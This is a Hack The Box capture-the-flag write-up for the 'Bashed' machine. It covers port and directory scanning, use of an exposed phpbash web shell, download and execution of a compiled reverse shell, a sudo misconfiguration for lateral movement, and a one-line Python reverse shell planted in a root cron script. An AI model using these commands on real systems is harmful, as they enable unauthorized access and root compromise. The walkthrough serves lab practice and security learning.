HTB: Bashed

Enumeration

I run nmap and found the port 80 open.

❯ ports=$(nmap -p- -T4 -Pn -n $(gettarget) | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

❯ echo $ports 
80

❯ nmap -sC -sV -p$ports -Pn 10.129.106.102 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 18:15 BST
Nmap scan report for 10.129.106.102
Host is up (0.048s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.78 seconds

The web appears to be the only service, so I go to check it:

Interesting, it looks like this server has uploaded a file called “phpbash”, if we click on the “phpbash” title, it takes us to another page with a link to the “phpbash” GitHub repository:

The page tells us that the “phpbash” is developed on this exact server, and the GitHub description says “phpbash is a semi-interactive PHP shell compressed into a single file”. If the “phpbash” file is really on this server could be very useful as a foothold.

User flag

I tried a few different URL router trying to find the phpbash file, but without success, so I used gobuster to scan for directories, and I found some interesting ones:

❯ gobuster dir -u http://10.129.106.102 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.106.102
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/05/08 18:31:00 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://10.129.106.102/images/]
/uploads              (Status: 301) [Size: 318] [--> http://10.129.106.102/uploads/]
/php                  (Status: 301) [Size: 314] [--> http://10.129.106.102/php/]    
/css                  (Status: 301) [Size: 314] [--> http://10.129.106.102/css/]    
/dev                  (Status: 301) [Size: 314] [--> http://10.129.106.102/dev/]    
/js                   (Status: 301) [Size: 313] [--> http://10.129.106.102/js/]     
/fonts                (Status: 301) [Size: 316] [--> http://10.129.106.102/fonts/]

I tried some of the directories, and finally found the phpbash shell on “http://10.129.106.102/dev/phpbash.php”:

I made a quick enumeration and found the flag on the “/home/arrexel/” directory, luckily for me the user.txt file have read permissions to “others”, so I was able to read it.

Root flag

First I created a reverse shell, just for commodity. I tried a bash reverse shell, but without success, so I ended up downloading a C reverse shell and uploaded the compiled binary to the target:

❯ git clone https://github.com/izenynn/c-reverse-shell.git
[...]

❯ cd c-reverse-shell

# the repo includes a script to quickly change the ip and port, so we don't need to edit the code
❯ ./change_client.sh 10.10.14.93 4444
Done!

# now compile!
❯ make
[...]

❯ python3 -m http.server 8080
[...]

I downloaded the binary on the target and executed it:

www-data@bashed:/dev/shm# wget 10.10.14.93:8080/reverse.elf
[...]
# chmod +x doesn't work
www-data@bashed:/dev/shm# chmod 711 reverse.elf
www-data@bashed:/dev/shm# ./reverse.elf

I upgraded the shell:

❯ nc -lvvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.93] from (UNKNOWN) [10.129.106.102] 54798

python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@bashed:/dev/shm$ export TERM=xterm
www-data@bashed:/dev/shm$ ^Z

❯ stty raw -echo; fg

www-data@bashed:/dev/shm$

We are ready, time for upload the linpeas.sh file for a quick enumeration.

I found something interesting:

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

I can run commands as the “scriptmanager” user, so let’s open a bash session with that user:

www-data@bashed:/dev/shm$ sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/dev/shm$ 

I run linpeas.sh again as scriptmanager user, to see what we can do with this user. I found that the scriptmanager user owns a directory called “scripts” on “/”:

╔══════════╣ Unexpected in root
/scripts
/initrd.img
/vmlinuz
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/scripts/test.txt
/home/scriptmanager/.gnupg/trustdb.gpg
/home/scriptmanager/.gnupg/pubring.gpg
/home/scriptmanager/.gnupg/gpg.conf
/var/log/auth.log
/var/log/syslog

It contains two files:

scriptmanager@bashed:/dev/shm$ ls -la /scripts/
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 May  8 10:17 test.txt

According to linpeas.sh, the “test.txt” file was modified in the last 5 minutes, that’s strange.

If we take a look at the “test.py” and “test.txt” files, we notice that “test.txt” is a file created by the script “test.py”. So, if “test.txt” was modified in the last 5 minutes and it’s a file that “test.py” creates, we can assume “test.py” is running on a cron, probably by root because is the owner of the “test.txt” file.

I modified the “test.py” file with nano, so the script now contains a python reverse shell, so now I only have to listen with netcat and wait, and the next time root executes “test.py” I will get the reverse shell as root.

scriptmanager@bashed:/scripts$ cat test.py 
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.93",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")

After waiting a few seconds I got the reverse shell:

❯ nc -lvvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.93] from (UNKNOWN) [10.129.106.102] 37980
# whoami
whoami
root
# 

And that’s all! I’m root.

>:D

Scroll to Top